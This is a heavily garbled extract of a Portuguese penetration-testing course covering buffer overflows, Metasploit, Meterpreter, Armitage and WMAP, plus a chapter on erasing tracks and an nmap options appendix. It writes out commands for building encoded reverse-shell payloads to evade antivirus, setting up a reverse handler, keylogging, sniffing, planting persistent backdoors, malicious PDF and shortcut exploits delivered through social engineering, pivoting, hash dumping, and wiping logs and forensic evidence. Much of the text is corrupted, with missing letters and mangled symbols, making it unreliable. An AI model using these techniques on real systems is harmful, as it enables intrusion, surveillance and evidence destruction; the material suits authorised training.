penetração remota de omputadores ligados a uma redeE onde um ataante an\nimo tem omo objetivo obter aesso ilegal ao omputador vulner3vel. 6esmo softGare onsiderado seguroE omo o OpenSS>E j3 apresentou o problemaE e tambm softGares famosos omo o Sendmail e m7dulos do 4pae. +uffer overfloGs são tambm amados de buffer overruns e e

tipos de ataques de estouro de bufferE entre eles sta: smasing atta:sE ataques ontra buffers que se enontram na pila vou am3,la de sta:JE e eap smasing atta:sE que são ataques ontra buffers que se enontram na eap. eniamenteE um buffer overfloG  um problema om a l7gia interna do programaE mas a e
Salve o arquivo omo overrun.E depois ompile e e
$ara test3,loE digite o seguinte no prompt e!FE8AB>!Fls

; veja o que aonteeW O que ausa essa falaE  o fato de que a vari3vel XnameY oupa apenas um determinado espaço que  pequenoJ na mem7ria. Ruando estouramos esse espaçoE e onseguimos sobresrever a pila ;I$ da mem7riaE inserindo um omando que queiramos que seja e
12!6! Con.lusão ●

Com issoE onseguimos demonstrar o perigo que  uma fala de programação em um programa.

●

= possível obter ontrole ompletamente sobre o programa que esta sendo e
●

Se o programa ofereer algum serviço remotamenteE a fala pode ser e

Capítulo 1 3etasploit ArameGor<

1!1! "#$etivos ●

;ntender omo funiona o 6etasploit

●

;ntender o funionamento e omo utiliDar o 6eterpreter

●

4prender omo onseguir one<ão direta e reversa om o alvo

●

4prender a implantar ba:doors atravs do 6etasploit

●

4prender a omprometer uma m3quina da rede interna atravs de uma -6` omprometida

Capítulo 19 >eta"plo%t rae:or( - 212

1!%! Introdução 4 pesquisa de vulnerabilidades de softGare evoluiu muito nos Qltimos anos. O pesquisador de vulnerabilidades  o tnio respons3vel em enontrar falas no softGare que podem levar a um mal funionamento do softGareE ou ainda a uma possível fala de segurança. 4 visão geral sobre segurança não se limita apenas a um possível invasor ou aesso não autoriDado ao sistemaE segurança de softGare signifia manter o softGare em seu perfeito funionamentoE ou sejaE o funionamento imaginado pelo desenvolvedor. 'o en3rio atual da segurança da informaçãoE infeliDmente tentamos proteger a informação não pela raiD do problemaE esrevendo programas om qualidadeE mas riando outros softGares para proteger um softGare mal desenvolvido anteriormente. $or e
1!)! " &ue ' 3etasploit ArameGor< Como menionado em seu 8ebsiteE 6etasploit FrameGor:  uma avançada plataforma Open SoureE onebida espeifiamente om o objetivo de reforçar e


aelerar o desenvolvimentoE ensaio e utiliDação de e
objetivo do

6SF



riar um

ambiente

de

pesquisaE

desenvolvimento e e
4escoberta da &ulnerabilidade? Onde o pesquisador desobre um erro de programação que pode levar ou não a uma brea de segurança

●

Análise? Onde o pesquisador analisa a vulnerabilidade para determinar quais as maneiras pela qual a mesma pode ser e
●

4esen&ol&imento do e3ploit? -epois de respondidas as perguntas da fase de an3liseE omeça o desenvolvimento da e

prova da e
Teste do e3ploit? 'essa fase o e
-esde a onsolidação do 6etasploit FrameGor:E a omparação om produtos omeriais om araterístias semelantes  inevit3vel. $rojetos C4'@4S da ImmunitA Se ou COB; I6$4C da Core SeuritA enologA tem uma grande lientelaE que vão desde grandes lientes orporativos que faDem uso destes produtos na ora de faDerem suas pr7prias tentativas de invasãoE at entenas de onsultores de segurança independente que utiliDam,no omo uma ferramenta para vender este serviço a tereiros. Sem dQvidaE a prinipal diferença entre 6etasploit FrameGor: e este tipo de produto  o ZfooZ. ;mbora os produtos omeriais preisem forneer onstantemente aos seus lientes os mais reentes e
1!4! Instalando 3etasploit ArameGor< ;m primeiro lugarE pois omo omentado nos par3grafos anterioresE 6etasploit FrameGor: pode ser instalado tanto no Hni<&/inu< quanto no 8indoGs. 4queles que se sentem onfort3veis om o 8indoGsE tem o praDer de saber


que a instalação do 6etasploit não tem grandes segredos. $ara esta Qltima versãoE os desenvolvedores do 6etasploit surpreendem,nos om um simp3tio assistenteE que ir3 guiar,nos atravs da implementação de um ambiente personaliDado CAgGinE seguida pela instalação e onfiguração do pr7prio FrameGor:. 4ssimE apenas o doGnload e a e
4p7s ter feito issoE preisa apenas dar permissão de e
;mbora seja verdade que om o que aonteeu at agora  sufiiente para se familiariDar om o produtoE se sua intenção  a de obter todo o proveito dessa ferramentaE provavelmente quer ter a erteDa que tena instalado o m7dulo $erl amado Z'et?? SS/eaAZ eE se não for esse o asoE proeda à sua instalação aproveitando que o mesmo instala,se om o 6etasploitE entre os arquivos organiDados no subdiret7rio Ze

1!-! Nm olEar so#re o ArameGor< $erfeitoW Se voV egou at aquiE provavelmente est3 ansioso para testar o funionamento de seu novo ambiente de trabalo. 4ntes de omeçarE preisamos saber que o 6etasploit FrameGor: fornee,nos basiamente trVs diferentes interfaesE no momento de interagir om os mesmos? ●

Command Gine Interface? ;sta  a forma orreta para interagir om o FrameGor:E quando da automatiDação de testes de seqVnias de e
●

Console Interface? = prov3vel que seja esta a interfae mais omumente utiliDadaE devido à sua utiliDação intuitiva e interativaE à veloidade do seu funionamento e à sua fle
●

Interface eb? ;mbora tena muitos detratoresE a interfae Geb 6etasploit pode ser e
1.5.1. Desenoli(en"o o *S9

4 primeira versão est3vel do 6SF foi lançada em meados de 2**#. Originalmente esrito em $erlE 4ssembler e C. Seus desenvolvedores veja a lista no endereçoJ resolveram quebrar o paradigma de omo os e

;srever um e

1!6! Te.nologia por detr/s do ArameGor<

O nQleo do 6etasploit reside no B;K BubA ;
; a doumentação da 4$I B;K? #ttp:$$frame%or&"metasploit"com$documents$api$re4$inde4"#tml

$ara eandlingE S;>E  uma proteção usada para ear o ontrole do flu

do programa e o S;> trata desses erros. 4 lasse Be. $ara maiores informaç%es onsulte? #ttp:$$%%%"ee
Ou ainda? #ttp:$$free%orld"t#c"org$do%nload"p#p7tLpfLractical-S;-e4ploitation"pdf

Frameor= Core? = formado de v3rios sub,sistemas omo gereniamento de m7dulosE sess%esE despao de eventos et. Frameor= ase? $rovV a interfae para interagir om o FrameGor: Core provendo onfiguraç%esE registro de logs e sess%es. Interfaces? $rovV a interfae om o usu3rioE atualmente são? msfonsoleE msfliE msfguiE msfGebE msfd. %0dulos? São ompostos pelos e
$ara o iniiante  importante saber a diferença entre e

onsiderada ideal e robusta. O 6etasploit pode servir para auditar essas ferramentas. ;
que

podem

ser

usadas

para

evadir

os

detetores

de

intrusãoE

C$??ma<_send_siDeE C$??send_delaAE >$??un:edE >$??ompressionE S6+??pipe_evasionE -C;B$C??bind_multiE -C;B$C??alter_onte
imestomp? Hsado para modifiar os arquivos do sistema de arquivo 'eG enologA File SAstem 'FSJ. $ode,se modifiar os valores de quando os arquivos foram riadosE deletados et.

●

Sla:er? Hsado para esonder arquivos em partiç%es 'FS.

●

Sam Puier? Hm m7dulo do 6eterpreter usado pra e
●

ransmogrifA? Ferramenta usada pra passar pelo ;nCases file, signaturing.

●

Soial,;ngineering ool:it? O Soial,;ngineering ool:it S;J foi desenvolvido por -avid ennedA Be/1J e inorpora muitos ataques Qteis de engenaria soialE todos em uma interfae simples. O prinipal objetivo do S;  automatiDar e melorar muitos dos ataques de engenaria soial a partir dele.

1!! Te.nologia do 3eterpreter PaKload 4 fase amada p7s,eost Intrusion -etetion SAstems podem soar um alarme assim que voV digitar seu primeiro omando no sell ou mesmo dei

O meterpreter supera as limitaç%es e fornee v3rias 4$Is que permitem ao ataante e
1!2! 3etasploit e "SST33 em vídeo ;stão disponíveis no site do FOS-;6 , Free and Open Soure SoftGare -evelopment , dois vídeos fant3stios. Simplesmente duas apresentaç%es sobre duas ferramentas esseniais em pentestE metasploit e a metodologia OSS6 Open Soure SeuritA esting 6etodologA 6anualJ. ; não  uma simples apresentaçãoE são duas apresentaç%es de duas oras tendo omo apresentador os pais das rianças >. -. 6oore e $ete >erDog respetivamente. ImperdívelW (etasploit

-

#ttp:$$ftp")elnet")e$mirrors$O'SD($B00E$O'SD(B00E-

(etasploit"ogg 'SST((

-

#ttp:$$ftp")elnet")e$mirrors$O'SD($B00E$O'SD(B00E-

Securit
@eja tambm alguns vídeos de utiliDação do 6etasploit FrameGor:? #ttp:$$%%%"

1!! tuali>ando o 3etasploit ;ntre no diret7rio do 6SF om o seguinte omando? = cd $pentest$e4ploits$frame%or&$

$ara atualiDar o 6SFE digite o seguinte omando? = svn update

1!10! Primeiros passos na utili>ação do 3etasploit 4bai
-epois de alguns segundos dependendo da veloidade de seu omputadorJE a tela de 6SFConsole apareer3 onforme a imagem. /eve alguns momentos para e

$ara ver os v3rios e

$ara informação sobre um omando em partiularE voV pode usar o omando de info. @oV sempre poder3 ter erteDa do omando se for Qtil antes de voV eK0Klsass[

@eja abaiK0Klsass Name: (icrosoft @S/SS Service Ds9olerpgradeDo%nlevelServer 'verflo% Yersion: >! latform: indo%s rivileged: jes @icense: (etasploit Orame%or& @icense rovided )<: #dm Z#dmGmetasploit"comP /vaila)le targets:

Capítulo 19 >eta"plo%t rae:or( - 225 Id Name -- ---0 /utomatic Targetting  indo%s B000 nglis# B indo%s H nglis# .asic options: Name ?urrent Setting 9equired Description -------- ------------------- ------------ -------------- 9;'ST >! /void: E c#aracters Description: T#is module e4ploits a stac& overflo% in t#e @S/SS service, t#is vulnera)ilit< %as originall< found )< e8 #ttp:$$%%%"microsoft"com$tec#net$securit<$)ulletin$(S0>-0"msp4 #ttp:$$mil%0rm"com$metasploit$F


;ssas informaç%es eK0Klsass

O prompt msfN automatiamente muda para Zmsf e

4gora preisamos saber o que podemos faDer om esse e
$ara definirmos o tipo de alvo que ataaremos e

autom3tioE 1  8indoGs 2*** e 2  8indoGs K$J. $ara sabermos o tipo de S.O. de nosso alvoE deveremos ter pesquisado isso na fase de fingerprintingE onde olemos informaç%es sobre nossos osts alvos. @amosE omo e
'esse pontoE se digitarmos Z!Z no prompt msfNE alm da e
Como e>!

@emos que o valor de B$OB est3 omo ##(E que ser3 a porta atravs da qual ser3 lançado o e
O valor da opção B$OB foi alterado para 1(*E que ser3 a porta utiliDada para o ataque. 4gora vamos à outra opção. 4 opção B>OS definir3 o endereço que ser3 ataado via e
@ejamos abai
4gora preisamos ompletar o e

'o aso desse e
1!11! n/lise inal Sinta,se à vontade para testar om outros e
1!1%! Pr/ti.a dirigida 1.12.1. Paloa !o( *e"er$re"er

Com o msf atualiDadoE iremos riar o paAload que enviaremos para o nosso alvo. $rosseguimos om o seguinte omando?

Capítulo 19 >eta"plo%t rae:or( - 231 =

"$msfpa
%indo%s$s#ell$reverseKtcp

@;'STLHH"HH"HH"HH

@'9TL>>!! H P cliqueaqui"e4e

Ser3 riado no diret7rio orrente o arquivo e
-epois dos resultadosE vamos faDer um XtunningY em nosso .e
"$msfpa
%indo%s$s#ell$reverseKtcp

@;'STLHH"HH"HH"HH

@'9TL>>!! 9 V "$msfencode -c ! -e 48F$s#i&ataKgaKnai -a 48F -t ra% V "$msfencode -c ! -a 48F -e 48F$alp#aKmi4ed -t ra% V "$msfencode -c  -e 48F$call>Kd%ordK4or -t e4e P cliqueaquiB"e4e

4 opção , diD quantas veDes ada enoder ir3 interagir om o nosso paAloadE nos dias de ojeE isso j3 não adianta muitoE demonstrado apenas para ver as possibilidades de se redireionar a saída de um enoder para outro. -epois do tunning em nosso .e
4p7s riar o .e>!! 

4o ser e
emos uma sessão ativa om I- de nQmero 1 identifiando,a. 4gora vamos interagir om o onsole meterpreterE basta o omando? P sessions -i 

Se o alvo abrir o gereniador de tarefas no GindoGsE ver3 o proesso de nosso eEB


Com isso feitoE vamos testar os omandos sAsinfo e iponfig. $ara saber os omandos disponíveisE digite XelpY ou X!Y.

1.12.2. elo##in# !o( *e"er$re"er

4gora vamos usar o :eAlogging e vamos tentar apturar o m3
4gora vamos ver o que nosso :eAlogger pegou om o omando :eAsan_dump e logo em seguida finaliDo o mesmo. P &e

1.12.3. Sniffin# !o( *e"er$re"er

$rimeiramente preisamos arregar o m7dulo sniffer om o omando use sniffer. P use sniffer

;m seguidaE pedimos para listar as interfaes de rede om o omando sniffer_interfaes. P snifferKinterfaces

Iremos iniiar nosso sniffer nesta interfae indiada pelo nQmero 1 om o omando Zsniffer_start 1ZE podemos esperar o tempo que aarmos onveniente. P snifferKstart 

@ejamos algumas informaç%es sobre o arquivo sniffer.ap usando o apinfos. P capinfos sniffer"cap


@amos analisar o arquivo sniffer.ap om a ferramenta 8iresar:. +asta abrir o 8iresar: e ir em File N Open e apontar para o arquivo sniffer.ap.

1.12.4. *an"eno o a!esso

; se a pessoa reiniiar ou at mesmo desligar a m3quina destino! $ara isso e
O omando aima riar3 um arquivo e
Capítulo 19 >eta"plo%t rae:or( - 236 P use e4ploit$multi$#andler P set /j@'/D %indo%s$meterpreter$reverseKtcp P set @;'ST AB"F8"0"0 P set @'9T >>>> P e4ploit

1.12.5. Prin"S!reen

Outro reurso interessante que o meterpreter nos oferee  a possibilidade de tirarmos um printsreen da m3quina alvo. P use espia


Hsamos o omando use espiaE para arregar o m7dulo meterpreter e em seguida e
$ara poder usar este reurso ser3 neess3rio estar e
1.12.6. *e"as$loi" &o%e F$loi"

4bra um terminal e entre no diret7rio do msf? = cd $pentest$e4ploits$frame%or&$ = "$msfconsole


@amos agora espeifiar o e
@amos alterar as seguintes opç%es? ●

FI/;'46;  Ser3 gerado o arquivo pdf om o nome aqui espeifiado por n7s.

●

I'FI/;'46;  4qui espeifiaremos um pdf omo modelo para ane
●

OH$H$4>  = o diret7rio onde ser3 riado e armaDenado o pdf.

P set OI@N/( planil#aB"pdf P set INOI@N/( $root$planil#a"pdf P set 'TT/T; $root$ P s#o% options


4gora vamos onfigurar nosso paAloadE usarei o meterpreter reverse_tp. @eja imagem abai>!! P e4ploit


'a imagem aima eu espeifique meu paAload GindoGs&meterpreter&reverse_tpJE espeifiquei meu ost loal />OS 152.10.*.11*JE espeifiquei mina porta loal /$OB ##((J e logo em seguida dei o omando e>!! P e4ploit

Hsamos o eOS 152.10.*.11*JE espeifiamos nossa porta que fiar3 esutando /$OB ##((J e por fimE e

1.12.7. &"a!ano '( o%Ke"io final a $ar"ir e '(a (M'ina K !o($ro(e"ia

O primeiro passo obviamente  enontrar uma vulnerabilidade no servidor que se enontra na -6` e e

4gora preisamos saber o I- da sessãoE para isso digitamos o seguinte no terminal do meterpreter? P sessions -l

O seguinte passo  riar uma rota at a m3quina que  nosso objetivo finalE indiando seu I$E a m3sara e o I- de sessão que obtivemos no passo anterior? = route add WipKmaquinaKo)1etivoX W(2scara de redeX WID-Sess3oX

$or QltimoE realiDamos o ataque à m3quina objetivoE de forma normalE omo se faria em qualquer outro asoE quer diDerE busando a vulnerabilidade e apliando o respetivo e
-esta forma podemos realiDar um ZbApassZ usando o 6etasploit

1.12.8. &"a!ano (M'inas inoHs >P is"a 7 2003 2008 a"ra;s e '( He%serer falso ;ssa e

@amos l3... O primeiro omando seleiona o eFKs#ortcutKiconKdllloader

Caso queiramos mais informaç%es sobre o e
;sse omando eOSE SB@$OB @amos onfigur3,las? P set S9Y;'ST AB"F8"0"8

;sse Qltimo omandoE permitir3 onfigurarmos o I$ no qual o servidor Geb falso ser3 montado para que a vítima aesso,o. 'o omando abai
>avendo onfigurado a parte b3sia do e>>>

udo onfiguradoE funionando bemE sem nenum erroE simplesmente lançamos o e
$ara onseguirmos que a vítima onete,seE nada omo um bom e velo ataque de engenaria soial ?,J


1!1)! rmitage 4 distribuição +a:ra: onta agora om mais uma opção de usabilidade do 6etasploitE essa nova opção  a 4rmitage. O 4rmitage  uma 9HI interfae gr3fiaJ para 6etasploitE que torna todo o proesso de ea:ingE basta dar alguns liques e prontoE sistema e

1.13.1. Confi#'ra)=o o &r(i"a#e $ara instalar o 4rmitage no +a:tra:E preisamos atualiDar os reposit7rios e instalar o paote ZarmitageZ. rootG)t:]= apt-get update rootG)t:]= aptitude install 1ava-pac&age rootG)t:]= apt-get install armitage npac&ing armitage from """$armitageK0"-)t0Ki8F"de)J """ Setting up armitage 0"-)t0J """

O 4rmitage omunia,se om o 6etasploit atravs do daemon B$CE então preisamos inii3,lo. rootG)t:]= msfrpcd -f - msf - test -t .asic WX H(@9? starting on 0"0"0"0:!!!! SS@J:.asic"""

4 pr7
$or

QltimoE

e
o

Zarmitage.sZ

a

partir

da

pasta

&pentest&e

Seleionamos a opção ZHse SS/ZE verifiamos os restante das onfiguraç%es e liamos em ZConnetZ. 4p7s issoE a janela prinipal do 4rmitage  e

1.13.2. arreno !o( o &r(i"a#e $ara seleionar uma varredura que queiramos eOSS. Outra opção para varreduraE  liar no menu >osts  6SF SansE e definirmos o range da rede que ser3 varrida em busa de alvos. Ou adiionar um ost espeífio em >osts  4dd >osts...

4p7s liar em Z/aunZE preisamos aguardar um pouo para que a varredura se omplete e os osts detetados sejam e

Se ouver algum ost que não queiramos utiliDar omo alvoE eles podem ser removidos liando om o botão direitoE eostZE e seleionando a opção ZBemove >ostZ. $odemos ver na figura abaiOSS baseado em nossa seleção.


Cliando om o botão direito e seleionando ZServiesZ uma nova aba se abrir3 e
6esmo om essas simples varredurasE podemos ver que onseguimos muitas informaç%es sobre nossos alvos que são apresentadas para n7s em uma interfae bem amig3vel. 4diionalmenteE todas as informaç%es são armaDenadas em nosso bano de dados 6ASR/. m

Data)ase c#anged m
V osKflavor

V

R---------------R-----------------R V AB"F8""B0! V indo%s B00 9B V V AB"F8""B0> V indo%s B00 9B V V AB"F8""B0F V indo%s H

V

V AB"F8""B0 V indo%s H

V

V AB"F8""B0 V indo%s H

V

R---------------R-----------------R ! ro%s in set 0"00 secJ m
1.13.3. F$lorano !o( o &r(i"a#e 'a varredura onduDida anteriormenteE podemos ver que um dos alvos est3 e

4ssim omo na varredura que onduDimos anteriormenteE toda a onfiguração neess3ria foi feita para n7s. udo o que preisamos  liar em Z/aunZ e aguardar a sessão do 6eterpreter ser aberta para n7s. @eja na imagem abai
Ruando liamos om o botão direito no ost e
FaDemos o dump dos ases no sistema e

4gora liamos em Z/aunZ e aguardamos reeber mais sells via 6eterpreterW

Como podemos verE o 4rmitage nos proporiona uma e<elente interfae para o 6etasploit que pode nos eonomiDar muito tempo em alguns asos. ;  possível enontrar mais informaç%es em seu site? #ttp:$$%%%"fastandeas<#ac&ing"com$media .


1!14! 5map Ge# s.anner 864$  um sanner de vulnerabilidades Geb que foi riado originalmente a partir de uma ferramenta amada SR/6ap. ;sta ferramenta  integrada om o 6etasploit e nos permite onduDir a varredura de apliaç%es Geb a partir do FrameGor:.

1.14.1. Confi#'rano o *a$ $rimeiro preisamos riar um novo bano de dados para armaDenar os resultados da varreduraE arregar o plgin ZGmapZE e e
Description

-----------

%mapKrun

Test targets

Capítulo 19 >eta"plo%t rae:or( - 254 %mapKsites

(anage sites

%mapKtargets (anage targets """corte"""

1.14.2. &i!ionano alos 4ntes de e
Displa< t#is #elp te4t

-a WurlX

/dd site v#ost,urlJ

-l

@ist all availa)le sites

-s WurlsX levelJ Displa< site structure v#ost,urlJ msf P %mapKsites -a dominio-a-partir-do-%%%,ip-v2lido

4p7s issoE aresentamos o alvo que desejamos varrer utiliDando o omando ZGmap_targets ,tZ. msf P %mapKtargets -t dominio-a-partir-do-%%%,ip-v2lido

Hsando o omando ZGmap_runZ iniiaremos a varredura do sistema alvo. $rimeiro usamos o parUmetro Z,tZ para listar os m7dulos que serão usados para varrer o sistema remoto. msf P %mapKrun -# WX sage: %mapKrun WoptionsX -#

Displa< t#is #elp te4t

-t

S#o% all matc#ing e4ploit modules

-e WprofileX matc#ed targets"

@aunc# profile test modules against all

Capítulo 19 >eta"plo%t rae:or( - 255 No profile runs all ena)led modules" msf P %mapKrun -t WX @oaded au4iliar<$scanner$#ttp$%e)davK%e)siteKcontent """ WX @oaded au4iliar<$scanner$#ttp$#ttpKversion """ WX @oaded au4iliar<$scanner$#ttp$%e)davKscanner """ WX @oaded au4iliar<$scanner$#ttp$svnKscanner """ WX @oaded au4iliar<$scanner$#ttp$soapK4ml """ """corte"""

udo o que resta agora  realiDar a varredura ontra nossa HB/ alvo. msf P %mapKrun -e WX sing /@@ %map ena)led modules" WX

@aunc#ing

au4iliar<$scanner$#ttp$%e)davK%e)siteKcontent

(/KS9Y9 against AB"F8""B0>:80 WX

Oound

file

or

director<

in

e)D/Y

response

AB"F8""B0>J

#ttp:$$AB"F8""B0>$ WX Scanned  of  #osts 00M completeJ WX @aunc#ing au4iliar<$scanner$#ttp$#ttpKversion (/KS9Y9 against AB"F8""B0>:80 WX AB"F8""B0> (icrosoft-IIS$F"0 """corte""" WX Scanned  of  #osts 00M completeJ WX

@aunc#ing

au4iliar<$scanner$#ttp$dirKlisting

(/KDI9

$

against

AB"F8""B0>:80""" WX Scanned  of  #osts 00M completeJ msf P

1.14.3. erifi!ano res'l"aos 4ssim que a varredura tiver finaliDadoE vamos verifiar o bano de dados para


ver se o Gmap enontrou algo de interessante. msf P d)K#osts -c address,svcs,vulns ;osts LLLLL address -------

svcs vulns ---- -----

AB"F8""B0> 



msf P

Olando a saída aimaE podemos ver que o Gmap

reportou uma

vulnerabilidade. ;
msf P d)Kvulns WX Time: T#u Nov B! 00:!0:BE T? B00 Yuln: #ostLAB"F8""B0> portL80

protoLtcp

nameL;TT-T9/?-N/.@D

refsL./#).<(D/@T(6'TgL ,./#).<(D/@T(0'TgL ,./#).
4 informação sobre a vulnerabilidade est3 odifiada no formato base0#E e por isso preisamos deodifi3,la. $odemos usar o openssl para isso.

Capítulo 19 >eta"plo%t rae:or( - 257 msf P ec#o [./#).<(D/@T(6'TgL[ V openssl )aseF> -d WX e4ec: ec#o [./#).<(D/@T(6'TgL[ V openssl )aseF> -d W?Y[B00!-A8 msf P

$odemos agora usar essa informação para onseguir mais detales obre a vulnerabilidades reportada. Como pentestersE devemos investigar ada informação enontrada e identifiar se 3 poteniais mtodos de ataque.

1!1-! ?a#orat9rio 3etasploit $bMeti&os? 1  Obter aesso remoto na m3quina /inu< e
1!16! Contramedidas ●

6anter todos os apliativos atualiDados

●

4pliar pates de orreção e segurança

●

6anter regras de fireGall bem onfiguradas


Capítulo %0 pagando Rastros

%0!1! "#$etivos ●

;ntender a importUnia de obrir rastros

●

Coneer as tnias para enobrir suas aç%es

●

Coneer as ferramentas empregadas

Capítulo 20 ;pagando *a"tro" - 259

%0!%! Por &ue en.o#rir rastros( Hm dos objetivosE em um teste de invasãoE de utiliDar tnias para enobrir seus rastros e aç%esE  para testar a efi3ia e ompetVnia do time de resposta a inidentes e períia forense aso os mesmos e
%0!)! " &ue en.o#rir( ●

/ogs de I-S ➢

●

Onde são armaDenadas todas as evidVnias de tr3fego anormal que tena sido detetado na rede. Isso inlui desde o envio de arquivos maliiosos à varreduras no sistemaE em busa de informaç%es.

/ogs de FireGall ➢

/ogs que guardam as informaç%es filtradas por regras de fireGall. 'ormalmente os administradoresE quando riam as regras de fireGallE tem por 3bito mandar armaDenar em log tentativas de varredurasE ataques de brute fore e aesso sem autoriDação a serviços espeífios.

●

4rquivos opiados no sistema ➢

Rualquer arquivo que tena sido opiado para o sistemaE mesmo que posteriormente seja apagadoE dei
Capítulo 20 ;pagando *a"tro" - 260 ●

4rquivos sendo e
odo programa ou arquivo em e
●

/ogs de omandos ➢

udo o que  digitado no terminal  armaDenado no .bas_istorA do usu3rioE por e
●

/ogs de sessão ➢

Ruando efetuamos o login e autentiamos uma sessão v3lidaE tudo o que oorre na mesma  armaDenado em logs. 4lgumas organiDaç%es possuemE inlusiveE servidores e<lusivos para armaDenamento e gereniamento de logs. 'o /inu
%0!4! T'.ni.as ●

Sobreesrita de dados ➢

Ruando apagamos algo em um disoE os dados são apenas marados para a deleção e não realmente apagados. Os dados marados para a deleçãoE são apagados apenas quando o sistema operaional utiliDa os mesmos bloos do diso para gravar novos dadosE realiDando a sobreesrita. Ruanto mais veDes aquele mesmo setor for sobreesritoE mais difíil se tornar3 a reuperação das informaç%es originalmente e
●

$revenção de riação de dados ➢

= possívelE atravs da alteração de permissão em determinados arquivosE que novos dados sejam inseridos no mesmoE por e

a possibilidade de esrita nos mesmoE nenuma nova operação ser3 armaDenadaE e o administrador do sistema não poder3 faDer a verifiação posterior para entender o que omprometeu o sistema ou a rede. ●

;nriptação de dados ➢

4 melor maneira de oultar um arquivoE para que ningum veja seu onteQdoE ou onsiga alter3,loE  enriptando,oE seja atravs de uma ferramenta espeífia de enriptaçãoE seja oultando o arquivo dentro de outroE uja e
●

-eleção segura de dados ➢

;ssa tnia est3 diretamente vinulada om a primeiraE de sobreesrita de dados. odo e qualquer proesso de deleção de arquivosE deve ser uidadosoE para que não seja possível a posterior reuperação das informaç%es.

%0!-! Aerramentas ●

or e Onion BouterJ ➢

O or mantm o usu3rio livre de bisbiloteirosE inlusive os do F+I e os da CI4E e impede ou difiulta bastanteJ qualquer tipo de rastreamento. ;  e
●

8ipe ➢

8ipe  um apliativo que permite a deleção segura de dadosE permitindo que o usu3rio defina quais arquivos serão apagados e quantas veDes aqueles bloos de disoE onde os arquivos apagados estavam aloadosE


serão sobreesritos. Ruanto mais veDes se sobreesreveE mais difíil a posterior reuperação dos dados. Cada operação de sobreesrita deve ser realiDada at o finalE para que o prorama seja ompletamente efiaD. ●

Srub ➢

Outra possibilidade para realiDar o Xdata GipingYE sobresrevendo os dados deletados om um padrão determinado de informaç%esE que podem ou não ser removidas no final da informação. Se não forem removidasE o perito forense enontrar3 apenas Xli
●

Stegide ➢

Stegide  um programa de esteganografia que  apaD de esonder dados em v3rios tipos de arquivos de 3udio e de imagem. 4s frequVnias de som e de orE respetivamenteE não são alteradas tornando o arquivo resistente ontra testes estatístios de primeira ordem. Formatos de arquivos P$;9E +6$E 84@ e 4H são suportados para uso omo arquivo de ZoberturaZ. 'ão 3 restriç%es sobre o formato dos dados seretos. O algoritmo de riptografia padrão  o Bijndael om uma ave de 12 bits de omprimento que  4;S , 4dvaned ;nrAption StandardJ. Se voV não onfia nesta ombinação por qualquer raDãoE sinta,se à vontade para esoler outra ombinação modo&algoritmo.

%0!6! Contramedidas ●

Instalar >ost I-S em todas as m3quinas

●

6anter as regras de fireGall e 'etGor: I-S bem onfiguradas

●

9ereniar logs em servidores pr7prios e bem protegidos

●

9ereniar permiss%es em servidoresE utiliDando ferramentas omo o S;/inu

Capítulo %1 @esaios: Testes de Invasão

%1!1! "#$etivo ●

;
●

Conseguir aesso ao arquivo Aou_got_te_flag.t
Capítulo 21 ?e"af%o"@ !e"te" de In#a"ão - 264

%1!%! @esaio 1 '3 m3quina om o I$ indiado pelo instrutorE 3 um apliação 8;+ simulando o site de um bano. O objetivo do desafio  e
%1!)! @esaio % 'esse desafio finalE na rede alvoE que pertene à empresa que le ontratou para realiDar o teste de invasãoE voV preisa enontrar um arquivo amado Aou_got_te_flag.taverão 12 arquivos XAou_Gin.pngY distribuídos pela redeE ap7s desobrir o 7digo eappA a:ingW


,7"S


Primeiro ane8o

"pç*es do ,map TARGET SPECIFICATION

SCAN TECHNIQUES

Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, microsoft.com/24, 192.1!.".1# 1"."."$2%%.1$2%4

-sS: +CP )- )can -s*: Connect )can -s!: C0 )can -s+: 8indows )can -s$: 3aimon scan -s: +CP &'', scan -s: I )can -s: mas )can

-iL : Inp&t from 'ist of hosts/networks

-iR : Choose random targets

--exclude : Exc'&de hosts/networks

--excludefile : Exc'&de 'ist from fi'e

--scanflags : C&stomi;e +CP scan f'ags -s/ <o)ie host[:poepot]>: Id'escan -s: IP protoco' scan - : +P 5o&nce scan

HOST DISCOVERY PORT SPECIFICATION AND SCAN ORDER

-sL: (ist )can $ simp'* 'ist targets to scan -sP: Ping )can $ determining if host is on'ine -P0: +reat a'' hosts as on'ine $$ skip host discoer* -PS[potlist]: +CP )- discoer* to gien ports -P![potlist]: +CP C0 discoer* to gien ports -P"[potlist]: P discoer* to gien ports -P#: IC3P echo re&est discoer* pro5es -PP: timestamp re&est discoer* pro5es -P$: netmask re&est discoer* pro5es -%&-R: eer/'wa*s reso'e ) $defa&'t sometimes --d%s-se'es : )pecif* c&stom ) serers

--s(ste)-d%s: se 6)7s ) reso'er

-p : 6n'* scan specified ports -: ast $ )can on'* ports 'isted in nmap$serices fi'e< -: )can ports consec&tie'* $ don7t randomi;e SERVICE/VERSION DETECTION

-s5: Pro5e open ports determine serice/ersion info --'esio%-i%te%sit( : )et from " ='ight< to 9 =tr* a'' pro5es<

--'esio%-li4ht: (imit to most 'ike'* pro5es =intensit* 2< --'esio%-ll: +r* eer* sing'e pro5e =intensit* 9<

--'esio%-tce: )how detai'ed ersion scan actiit* =for de5&gging<

Capítulo 21 ?e"af%o"@ !e"te" de In#a"ão - 267 6) E+EC+I6 -O: Ena5'e 6) detection --sscan-l!"!#: (imit 6) detection to promising targets --sscan-g$%ss: >&ess 6) more aggressie'*

once -': Increase er5osit* 'ee' =&se twice for more effect< -d[le'el]: )et or increase de5&gging 'ee' =p to 9<

--pcet-tce: )how a'' packets sent and receied

--iflist: Print host interfaces and ro&tes =for de5&gging<

--lo4-eos: (og errors/warnings to the norma'$format TI&ING AND PERFOR&ANCE

o&tp&t fi'e

--ppe%d-output:

ppend to rather than c'o55er specified o&tp&t fi'es 6ptions which take ?time@ are in mi''iseconds, &n'ess *o& --esu)e : Des&me an a5orted scan append 7s7 =seconds<, 7m7 =min&tes<, or 7h7 =ho&rs< to the --st(lesheet : a'&e =e.g. A"m<. )( st*'esheet to transform 3( o&tp&t to +3( -*[0-6]: )et timing temp'ate =higher is faster<

--)i%-host4oup&)x-host4oup : Para''e' host scan gro&p si;es

--)i%-pllelis)&)x-pllelis) : Pro5e para''e'i;ation

--)i%-tt-ti)eout&)x-tt-ti)eout&i%itiltt-ti)eout : )pecifies pro5e ro&nd trip time. --)x-eties : Caps n&m5er of port scan pro5e retransmissions.

--host-ti)eout : >ie &p on target after this 'ong

--sc%-del(&--)x-sc%-del( : dB&st de'a* 5etween pro5es

--;ex)l:

